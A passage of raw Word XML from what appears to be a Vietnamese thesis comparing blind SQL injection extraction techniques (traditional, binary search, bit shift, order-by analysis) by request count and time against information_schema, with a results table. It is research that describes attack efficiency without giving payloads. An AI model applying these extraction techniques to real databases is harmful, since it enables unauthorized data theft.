          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CC8372E" wp14:editId="47F9B128">
            <wp:extent cx="5972175" cy="730417"/>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972175" cy="730417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 1 và thời gian thực hiện xong là 14 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Trong bài kiểm tra tiếp theo, thực hiện lấy một chuỗi ký tự với độ dài chưa biết. Các phương pháp sẽ phải thực hiện lấy độ dài chuỗi ký tự đó (bằng thuật toán của mình), rồi tiếp tuc lấy ký tự đó. Câu lệnh truy vấn sẽ là: select </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t xml:space="preserve">DESCRIPTION from </w:t>
      </w:r>
      <w:r w:rsidRPr="0090349F">
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>CHARACTER_SETS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>limit 6,1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – lấy giá trị </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong bảng </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>CHARACTER_SETS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, database </w:t>
      </w:r>
      <w:r w:rsidRPr="0090349F">
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại dòng thứ 6. Độ dài của ký tự này là 27.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.blind:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510E3661" wp14:editId="294901D4">
            <wp:extent cx="5972175" cy="3124851"/>
            <wp:effectExtent l="1905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5972175" cy="3124851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 946 và thời gian thực hiện xong là 2152 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F227C7">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.binary_search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D7ECA4" wp14:editId="269E4C7C">
            <wp:extent cx="5972175" cy="2958834"/>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5972175" cy="2958834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 224 và thời gian thực hiện xong là 579 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F227C7">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.bit_shift:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E90318" wp14:editId="03288597">
            <wp:extent cx="5972175" cy="3066710"/>
            <wp:effectExtent l="19050" t="0" r="952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972175" cy="3066710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 196 và thời gian thực hiện xong là 509 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005B29B5">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.orderby:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4499AB7A" wp14:editId="565434F3">
            <wp:extent cx="5972175" cy="3420509"/>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972175" cy="3420509"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 28 và thời gian thực hiện xong là 102 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005B29B5">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Tổng kết lại có bảng so sánh sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="746"/>
        <w:gridCol w:w="2915"/>
        <w:gridCol w:w="1865"/>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="1802"/>
      </w:tblGrid>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Phương pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Độ dài chuỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Số yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Thời gian</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Truyền thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>144</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tìm kiếm nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dịch bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Phân tích thứ tự trả về</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Truyền thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>946</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>2152</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tìm kiếm nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>579</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dịch bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>196</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>509</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00CB5073">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Phân tích thứ tự trả về</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1924" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00CB5073">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Dựa vào các số liệu, luận văn xây dựng 02 biểu đồ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF48D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77801FA5" wp14:editId="094B0730">
            <wp:extent cx="4572000" cy="2743200"/>
            <wp:effectExtent l="19050" t="0" r="19050" b="0"/>
            <wp:docPr id="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571796" w:rsidRPr="004E7ED7" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc458436448"/>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
